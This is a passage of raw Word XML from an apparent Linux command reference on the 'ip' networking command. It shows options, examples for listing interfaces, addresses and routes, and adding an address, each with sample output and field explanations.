              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Output on single line</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="6707564E" w14:textId="77777777" w:rsidTr="0017552F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53FA2004" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
              </w:rPr>
              <w:t>-t, --timestamp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DAB1311" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Show timestamp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="50BFB5D2" w14:textId="77777777" w:rsidTr="0017552F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F86D417" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
              </w:rPr>
              <w:t>-b, --batch [filename]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12834376" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Read commands from file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0017552F" w:rsidRPr="0017552F" w14:paraId="7B3DE0C9" w14:textId="77777777" w:rsidTr="0017552F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65AF1CB8" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C00000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
              </w:rPr>
              <w:t>-n, --netns name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09ED9A1C" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="0017552F">
              <w:t>Switch to network namespace</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0FE57D34" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Examples and Use Cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7200E2DE" w14:textId="4FE9DD0A" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Display all network interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270C5A95"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ip link show</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFBCA64" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19902404"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1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C25E15"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link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A0210C"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2: eth0: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc pfifo_fast state UP mode DEFAULT group default qlen 1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A20A5E5"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link/ether 52:54:00:12:34:56 brd ff:ff:ff:ff:ff:ff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3189288B"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3: wlan0: &lt;BROADCAST,MULTICAST&gt; mtu 1500 qdisc noop state DOWN mode DEFAULT group default qlen 1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E53AFA"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link/ether 80:86:f2:ab:cd:ef brd ff:ff:ff:ff:ff:ff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76148AE5" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D21599F" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="124"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Interface numbers</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t>: 1, 2, 3 are system-assigned interface indices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5377E7ED" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="124"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>lo</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t>: Loopback interface for internal system communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A094DA8" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="124"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>eth0</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t>: Ethernet interface (UP and active)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F508B7" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="124"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>wlan0</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t>: Wireless interface (DOWN and inactive)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005C106D" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="124"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flags</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t>: UP=active, LOWER_UP=physical link up, BROADCAST=supports broadcasting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EEE50F" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="124"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MTU</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t>: Maximum transmission unit (65536 for loopback, 1500 for Ethernet/WiFi)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D66AE1" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="124"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>qdisc</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t>: Queuing discipline (noqueue, pfifo_fast, noop for traffic control)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCF40AF" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="124"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>state</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t>: UP=active, DOWN=inactive, UNKNOWN=indeterminate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F158A8" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="124"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MAC addresses</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t>: Hardware addresses for each interface (all zeros for loopback)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE31221" w14:textId="6C9587D2" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Display IP addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153B4173"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ip addr show</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4A9ADE" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5223F211"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1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480A5197"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link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE8D869"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inet 127.0.0.1/8 scope host lo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C303B8"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valid_lft forever preferred_lft forever</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35727FF0"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inet6 ::1/128 scope host </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A2E8B7"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valid_lft forever preferred_lft forever</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C675BD"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2: eth0: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709FDBE1"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link/ether 52:54:00:12:34:56 brd ff:ff:ff:ff:ff:ff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC32945"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inet 192.168.1.100/24 brd 192.168.1.255 scope global dynamic eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D131083"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valid_lft 86392sec preferred_lft 86392sec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6D4044"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inet6 fe80::5054:ff:fe12:3456/64 scope link </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D473FE7"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valid_lft forever preferred_lft forever</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716B5A88" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7CF689" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="125"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>inet 127.0.0.1/8</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t>: Loopback IPv4 address with /8 subnet (255.0.0.0 mask)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0ACB99" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="125"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>inet 192.168.1.100/24</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t>: Ethernet IPv4 address with /24 subnet (255.255.255.0 mask)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483180A7" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="125"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>brd 192.168.1.255</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t>: Broadcast address for the subnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2158DE" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="125"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>scope global</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve">: Address is globally routable; </w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>scope host</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t>: local to host only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505AFA17" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="125"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dynamic</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve">: Address assigned via DHCP; </w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> would be manually configured</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D391C19" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="125"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>valid_lft/preferred_lft</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t>: DHCP lease lifetime (86392 seconds ≈ 24 hours)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F7B976" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="125"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>inet6 ::1/128</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t>: IPv6 loopback address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14929732" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="125"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>inet6 fe80::</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Link-local IPv6 address (auto-configured for local network)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BF1CE6" w14:textId="2647CEDE" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Add IP address to interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC4852F"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sudo ip addr add 192.168.1.50/24 dev eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A364FEA" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Adding secondary IP address for virtual hosting or testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A496F4" w14:textId="1A08F8C2" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Display routing table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353FEB67"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ip route show</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7036A34F" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B24062E"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default via 192.168.1.1 dev eth0 proto dhcp metric 100 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300E15E9"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169.254.0.0/16 dev eth0 scope link metric 1000 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276B6795"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192.168.1.0/24 dev eth0 proto kernel scope link src 192.168.1.100 metric 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E719419" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464B5C2C" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="126"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004F482C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>default via 192.168.1.1</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t>: Default gateway route (all traffic goes to 192.168.1.1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541BDCB3" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="126"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004F482C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>proto dhcp</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t>: Route was added by DHCP client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEE9B43" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="126"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004F482C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>metric 100</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t>: Route priority (lower numbers preferred)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC74A2F" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="126"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004F482C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>169.254.0.0/16</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t>: Link-local network for auto-configuration when DHCP fails</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4775B5AE" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="126"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004F482C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>192.168.1.0/24</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t>: Direct route to local subnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C7AE6E" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="126"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004F482C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>proto kernel</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t>: Route added automatically by kernel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7B59BF" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="126"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004F482C">
